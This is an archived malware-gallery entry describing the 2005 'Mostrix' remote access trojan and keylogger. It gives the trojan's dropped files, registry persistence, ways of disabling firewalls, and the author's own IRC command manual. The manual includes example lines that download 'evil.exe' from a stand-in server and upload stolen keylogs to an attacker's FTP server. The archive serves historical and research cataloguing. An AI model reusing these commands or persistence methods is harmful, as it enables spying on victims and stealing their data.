
Mostrix

Released 20 years, 10 months ago. June 2005

Copyright © MegaSecurity

By DiA


Information
Author: DiA
Family: Mostrix
Category: Remote Access
Version: Mostrix
Release Date: Jun 2005, 20 years, 10 months ago.
Additional Information
Server:
dropped files:
c:\WINDOWS\MStr.exe            Size: 10,240 bytes 
c:\WINDOWS\mslog\070206.sys    Size: 127 bytes 

startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "MS.trix"
data: C:\WINDOWS\MStr.exe 

attempts to connect to an IRC Server

tested on Windows XP
February 07, 2006

Author Information / Description
features:
		- installs itself into the system with 4 methods:
			> first tries to copy to the windows folder and make an autostart registry entry
			> if Mostrix can't write to the registry, it edits win.ini in the windows folder
			> if Mostrix can't write to the windows directory, it tries to copy itself
			  to the startup folder
			> if it can't copy to the startup folder, it edits autoexec.bat in C:\
		- logs every key event and foreground windows and saves all logs
		  under current date .sys in the windows directory under subdir "mslog"
		- kills some favorite firewalls and internet security suites
		- connects to irc.freenode.net and accepts private commands in chan "mostrix"
		- reconnects every half hour

	commands:
		- every command is only accepted in private chat!

		systeminfo 'temporary file path'
		ae: systeminfo 'C:\info.txt'

			> this command gets some info about the infected system and saves it
			  in a temporary file...

		dirlist 'directory to list' 'temporary file path'
		ae: dirlist 'C:\' 'C:\C_drive_dirs.txt'

			> this command lists all subdirectories in a temporary file...

		filelist 'directory to list' 'temporary file path'
		ae: filelist 'C:\' 'C:\C_drive_files.txt'

			> this command lists all files in one directory and saves it
			  in a temporary file...

		delete 'file to delete'
		ae: delete 'C:\C_drive_files.txt'

			> this command deletes a file, just use it to remove your
			  temporary files...

		execute 'application to execute'
		ae: execute 'C:\Windows\Notepad.exe'

			> this command executes an application, maybe one you downloaded
			  to the infected computer...

		download 'http:// url file to download' 'save path'
		ae: download 'http://server.com/user/evil.exe' 'C:\nice.exe'

			> downloads a file via http protocol to the local infected computer...

		upload 'file to upload' 'ftp server' 'user' 'password'
		ae: upload 'C:\info.txt' 'server.com' 'user' 'drowssap'

			> this command uploads a local file of the infected computer
			  to your ftp server, name at ftp server is the same as on disk...

	steal a log:
		Let's say you want a keylog from 7 June 2005, just do this
		(imagine "Windows" is the windows directory):

			upload 'C:\Windows\mslog\070605.sys' 'server.com' 'user' 'pass'

DiA

This archive is an almost-complete reconstruction of the legendary Mega Security (also known as Kobayashi), a premier 90s-era "Trojan Database" where malware authors once showcased their work. After a decade offline, the site was brought back in August 2024 by its original creator, MasterRat, who authorized the Malware Gallery to host this modernized, searchable version of the collection. While the original site remains available for those seeking a nostalgic, old-school experience, we are proud to continue its legacy here. Full credit and thanks go to MasterRat and the retired Mega Security staff for their years of dedicated work in cataloging these historical samples.